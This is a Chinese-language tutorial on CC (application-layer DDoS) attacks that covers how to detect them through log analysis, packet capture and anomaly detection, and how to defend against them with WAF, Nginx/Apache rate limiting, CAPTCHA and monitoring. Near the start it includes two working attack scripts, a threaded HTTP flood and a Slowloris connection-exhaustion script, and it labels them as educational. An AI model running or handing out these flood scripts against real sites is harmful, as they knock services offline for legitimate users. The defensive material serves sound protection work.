什么是CC攻击?

CC攻击(Challenge Collapsar)是一种常见的分布式拒绝服务(DDoS)攻击类型,主要针对Web应用层。攻击者通过控制大量僵尸主机(Botnet)向目标服务器发送大量看似合法的HTTP请求,耗尽服务器资源(如CPU、内存、带宽),导致正常用户无法访问网站。

与传统的DDoS攻击不同,CC攻击的流量特征更隐蔽,因为请求看起来像正常用户行为,这使得识别和防御更具挑战性。

CC攻击的常见类型

1. HTTP Flood攻击

攻击者发送大量HTTP GET或POST请求,消耗服务器资源。

示例代码(模拟攻击流量):

import requests
import threading
import time

def attack(target_url, threads=100):
    def send_request():
        while True:
            try:
                response = requests.get(target_url, timeout=5)
                print(f"Status: {response.status_code}")
            except:
                pass
    
    for _ in range(threads):
        thread = threading.Thread(target=send_request)
        thread.daemon = True
        thread.start()
    
    while True:
        time.sleep(1)

# 使用示例(仅用于教育目的)
# attack("http://example.com")

2. Slowloris攻击

攻击者建立大量连接但发送极慢的数据,占用服务器连接池。

示例代码(模拟Slowloris攻击):

import socket
import random
import time

def slowloris_attack(target_ip, target_port, connections=200):
    sockets = []
    
    for i in range(connections):
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((target_ip, target_port))
            s.send(f"GET / HTTP/1.1\r\nHost: {target_ip}\r\n".encode())
            sockets.append(s)
        except:
            pass
    
    while True:
        for s in sockets:
            try:
                s.send(f"X-a: {random.randint(1, 5000)}\r\n".encode())
            except:
                sockets.remove(s)
        time.sleep(15)

# 使用示例(仅用于教育目的)
# slowloris_attack("192.168.1.100", 80)

3. HTTP POST Flood

攻击者发送大量POST请求,消耗服务器处理能力。

4. 针对特定资源的攻击

攻击者针对消耗资源的特定URL(如登录页面、搜索功能、API接口)进行攻击。

CC攻击的识别方法

1. 流量特征分析

正常流量 vs CC攻击流量对比:

特征 正常流量 CC攻击流量
请求频率 分散、有规律 集中、爆发式
请求来源 分散IP 集中IP或大量不同IP
请求内容 多样化 重复或相似
会话行为 有浏览路径 直接访问特定页面
时间分布 符合用户作息 24小时持续

2. 监控指标

关键监控指标:

  • 请求速率(RPS):每秒请求数异常增长
  • 并发连接数:服务器连接数激增
  • CPU/内存使用率:资源占用率飙升
  • 响应时间:正常请求响应时间变慢
  • 错误率:5xx错误增加

3. 日志分析

Apache/Nginx日志分析示例:

# 查找异常IP(短时间内大量请求)
awk '{print $1}' access.log | sort | uniq -c | sort -nr | head -20

# 查找异常URL(被频繁访问的URL)
awk '{print $7}' access.log | sort | uniq -c | sort -nr | head -20

# 查找异常User-Agent
awk -F'"' '{print $6}' access.log | sort | uniq -c | sort -nr | head -20

# 统计每分钟请求量
awk '{print $4}' access.log | cut -d: -f1,2 | uniq -c

4. 使用工具检测

使用Wireshark分析:

# 过滤HTTP请求
http.request.method == "GET"

# 过滤特定IP的请求
ip.src == 192.168.1.100

# 统计请求频率
Statistics -> HTTP -> Requests

使用tcpdump捕获流量:

# 捕获HTTP流量
tcpdump -i eth0 -w capture.pcap port 80

# 分析捕获的文件
tcpdump -r capture.pcap -nn | grep -E "GET|POST"

5. 机器学习检测

使用Python进行异常检测:

import pandas as pd
from sklearn.ensemble import IsolationForest
import numpy as np

# 模拟日志数据
def generate_log_data():
    data = []
    for i in range(1000):
        # 正常请求
        data.append({
            'ip': f'192.168.1.{i%255}',
            'request_count': np.random.poisson(5),
            'request_size': np.random.normal(1024, 200),
            'response_time': np.random.normal(0.5, 0.1)
        })
    
    # 添加攻击流量
    for i in range(100):
        data.append({
            'ip': f'10.0.0.{i}',
            'request_count': np.random.poisson(100),
            'request_size': np.random.normal(500, 50),
            'response_time': np.random.normal(2.0, 0.5)
        })
    
    return pd.DataFrame(data)

# 异常检测
def detect_anomaly(df):
    # 特征选择
    features = ['request_count', 'request_size', 'response_time']
    
    # 训练孤立森林模型
    clf = IsolationForest(contamination=0.1, random_state=42)
    clf.fit(df[features])
    
    # 预测异常
    df['anomaly'] = clf.predict(df[features])
    
    return df[df['anomaly'] == -1]

# 使用示例
# log_data = generate_log_data()
# anomalies = detect_anomaly(log_data)
# print(f"检测到 {len(anomalies)} 个异常请求")

CC攻击的防范措施

1. Web应用防火墙(WAF)

部署WAF规则示例:

ModSecurity规则示例:

# 限制单个IP的请求频率
SecRule REMOTE_ADDR "@ipMatch 192.168.1.0/24" \
    "id:1001,phase:1,pass,nolog,ctl:ruleEngine=On"

# 限制请求速率
SecRule REQUEST_HEADERS:User-Agent "@contains Bot" \
    "id:1002,phase:1,pass,log,deny,status:403"

# 限制并发连接数
SecRule REMOTE_ADDR "@ipMatch 192.168.1.100" \
    "id:1003,phase:1,pass,log,deny,status:429"

Nginx配置示例:

# 限制请求速率
limit_req_zone $binary_remote_addr zone=one:10m rate=10r/s;

server {
    location / {
        limit_req zone=one burst=20 nodelay;
        proxy_pass http://backend;
    }
}

# 限制并发连接数
limit_conn_zone $binary_remote_addr zone=addr:10m;

server {
    location / {
        limit_conn addr 10;
        proxy_pass http://backend;
    }
}

2. CDN和云防护服务

使用Cloudflare防护:

// 在Cloudflare Worker中设置防护规则
addEventListener('fetch', event => {
    event.respondWith(handleRequest(event.request))
})

async function handleRequest(request) {
    const clientIP = request.headers.get('CF-Connecting-IP')
    const userAgent = request.headers.get('User-Agent')
    
    // 检查是否为恶意请求
    if (isMaliciousRequest(request)) {
        return new Response('Access Denied', { status: 403 })
    }
    
    return fetch(request)
}

function isMaliciousRequest(request) {
    // 实现检测逻辑
    return false
}

3. 服务器配置优化

Apache配置示例:

# 限制请求超时
Timeout 30
KeepAliveTimeout 5

# 限制并发连接数
MaxRequestWorkers 150
MinSpareThreads 25
MaxSpareThreads 75

# 限制请求大小
LimitRequestBody 10485760

# 限制请求方法
<LimitExcept GET POST HEAD>
    Order deny,allow
    Deny from all
</LimitExcept>

Nginx配置示例:

# 限制请求体大小
client_max_body_size 10M;

# 限制请求超时
client_body_timeout 10s;
client_header_timeout 10s;

# 限制并发连接数
worker_connections 1024;

# 限制请求频率
limit_req_zone $binary_remote_addr zone=api:10m rate=1r/s;

location /api/ {
    limit_req zone=api burst=5 nodelay;
}

4. 应用层防护

代码示例(Python Flask):

from flask import Flask, request, jsonify
from flask_limiter import Limiter
from flask_limiter.util import get_remote_address
import time
from collections import defaultdict

app = Flask(__name__)

# 限制器配置
limiter = Limiter(
    app,
    key_func=get_remote_address,
    default_limits=["200 per day", "50 per hour"]
)

# 请求频率限制
@app.route('/api/data')
@limiter.limit("10 per minute")
def get_data():
    return jsonify({"data": "some data"})

# 自定义请求频率限制
request_counts = defaultdict(list)

@app.route('/api/search')
def search():
    client_ip = request.remote_addr
    now = time.time()
    
    # 清理旧记录
    request_counts[client_ip] = [
        t for t in request_counts[client_ip] 
        if now - t < 60
    ]
    
    # 检查频率
    if len(request_counts[client_ip]) > 10:
        return jsonify({"error": "Too many requests"}), 429
    
    request_counts[client_ip].append(now)
    
    # 处理搜索逻辑
    query = request.args.get('q', '')
    return jsonify({"results": f"Search results for {query}"})

if __name__ == '__main__':
    app.run(debug=True)

5. 验证码和人机验证

使用reCAPTCHA示例:

<!DOCTYPE html>
<html>
<head>
    <script src="https://www.google.com/recaptcha/api.js" async defer></script>
</head>
<body>
    <form action="/submit" method="POST">
        <input type="text" name="username" placeholder="用户名">
        <input type="password" name="password" placeholder="密码">
        
        <!-- reCAPTCHA v2 -->
        <div class="g-recaptcha" data-sitekey="YOUR_SITE_KEY"></div>
        
        <button type="submit">登录</button>
    </form>
</body>
</html>

后端验证(Python):

import requests
from flask import request, jsonify

def verify_recaptcha(token):
    secret_key = "YOUR_SECRET_KEY"
    url = "https://www.google.com/recaptcha/api/siteverify"
    
    payload = {
        'secret': secret_key,
        'response': token
    }
    
    response = requests.post(url, data=payload)
    result = response.json()
    
    return result.get('success', False)

@app.route('/submit', methods=['POST'])
def submit():
    recaptcha_token = request.form.get('g-recaptcha-response')
    
    if not verify_recaptcha(recaptcha_token):
        return jsonify({"error": "CAPTCHA verification failed"}), 400
    
    # 处理表单数据
    username = request.form.get('username')
    password = request.form.get('password')
    
    return jsonify({"success": True})

6. 负载均衡和自动扩展

使用Nginx作为负载均衡器:

upstream backend {
    least_conn;
    server 192.168.1.101:80 max_fails=3 fail_timeout=30s;
    server 192.168.1.102:80 max_fails=3 fail_timeout=30s;
    server 192.168.1.103:80 max_fails=3 fail_timeout=30s;
}

server {
    listen 80;
    server_name example.com;
    
    location / {
        proxy_pass http://backend;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        
        # 超时设置
        proxy_connect_timeout 5s;
        proxy_send_timeout 10s;
        proxy_read_timeout 10s;
    }
}

7. 监控和告警

使用Prometheus + Grafana监控:

# prometheus.yml 配置
scrape_configs:
  - job_name: 'nginx'
    static_configs:
      - targets: ['localhost:9113']
  
  - job_name: 'node_exporter'
    static_configs:
      - targets: ['localhost:9100']

自定义监控脚本:

import psutil
import time
import requests
from datetime import datetime

def monitor_server():
    while True:
        # 获取系统指标
        cpu_percent = psutil.cpu_percent(interval=1)
        memory_percent = psutil.virtual_memory().percent
        disk_usage = psutil.disk_usage('/').percent
        
        # 获取网络连接数
        connections = len(psutil.net_connections())
        
        # 获取HTTP请求速率(通过日志分析)
        # 这里简化处理,实际应从日志文件读取
        request_rate = 100  # 示例值
        
        # 检查异常
        if cpu_percent > 80 or memory_percent > 85:
            send_alert(f"High resource usage: CPU={cpu_percent}%, Memory={memory_percent}%")
        
        if request_rate > 1000:
            send_alert(f"High request rate: {request_rate} RPS")
        
        time.sleep(60)

def send_alert(message):
    # 发送告警到Slack、邮件等
    print(f"[ALERT] {datetime.now()}: {message}")
    # 实际实现中,这里会调用告警接口

if __name__ == "__main__":
    monitor_server()

实战案例分析

案例1:电商网站CC攻击防护

场景:某电商网站在促销期间遭受CC攻击,攻击者针对商品详情页和搜索接口。

防护措施

  1. 部署WAF:设置规则限制单个IP每分钟最多100次请求
  2. 启用CDN:使用Cloudflare的DDoS防护
  3. 缓存优化:对商品详情页进行缓存,减少后端压力
  4. 限流策略:对搜索接口实施严格的速率限制
  5. 验证码:在登录和支付页面增加验证码

效果:攻击流量被成功拦截,网站正常运行,转化率未受影响。

案例2:API服务防护

场景:某API服务遭受CC攻击,攻击者针对认证接口。

防护措施

  1. API网关:使用Kong或APISIX作为API网关
  2. 令牌桶算法:实现严格的速率限制
  3. IP黑名单:自动将异常IP加入黑名单
  4. 请求签名:要求所有请求必须包含签名
  5. 熔断机制:当错误率超过阈值时自动熔断

代码示例(API网关限流):

from flask import Flask, request, jsonify
import redis
import time

app = Flask(__name__)
redis_client = redis.Redis(host='localhost', port=6379, db=0)

def rate_limit(key, limit=100, window=60):
    """令牌桶算法限流"""
    current = int(time.time())
    window_key = f"{key}:{current // window}"
    
    # 获取当前令牌数
    tokens = redis_client.get(window_key)
    if tokens is None:
        tokens = 0
    else:
        tokens = int(tokens)
    
    if tokens >= limit:
        return False
    
    # 增加令牌
    redis_client.incr(window_key)
    redis_client.expire(window_key, window)
    
    return True

@app.route('/api/login', methods=['POST'])
def login():
    client_ip = request.remote_addr
    
    if not rate_limit(f"login:{client_ip}", limit=10, window=60):
        return jsonify({"error": "Rate limit exceeded"}), 429
    
    # 处理登录逻辑
    username = request.json.get('username')
    password = request.json.get('password')
    
    # 验证逻辑...
    
    return jsonify({"success": True})

if __name__ == '__main__':
    app.run(debug=True)

最佳实践总结

1. 分层防御策略

  • 网络层:使用防火墙、CDN、负载均衡
  • 传输层:启用SSL/TLS,使用WAF
  • 应用层:实施速率限制、验证码、请求验证
  • 数据层:数据库查询优化,连接池管理

2. 监控和响应

  • 实时监控:建立完整的监控体系
  • 自动化响应:设置自动告警和阻断规则
  • 日志分析:定期分析日志,发现异常模式
  • 应急响应:制定应急预案,定期演练

3. 持续优化

  • 定期评估:定期评估防护策略的有效性
  • 更新规则:根据攻击趋势更新防护规则
  • 性能测试:定期进行压力测试
  • 安全审计:定期进行安全审计和渗透测试

4. 合规和法律

  • 遵守法规:确保防护措施符合当地法律法规
  • 数据隐私:保护用户隐私,合规收集数据
  • 日志保留:按照要求保留安全日志
  • 报告义务:及时报告重大安全事件

结论

CC攻击是一种复杂且持续演变的威胁,需要综合性的防护策略。通过结合技术手段、管理措施和持续监控,可以有效识别和防范CC攻击。关键是要建立多层次的防御体系,从网络层到应用层全面防护,同时保持对新攻击手法的警惕和适应能力。

记住,没有绝对的安全,只有相对的安全。持续改进和适应是应对CC攻击的关键。